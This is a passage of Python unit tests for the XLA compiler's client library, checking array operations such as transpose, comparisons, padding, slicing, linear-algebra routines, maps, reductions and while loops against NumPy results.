c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.xla_data_pb2.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
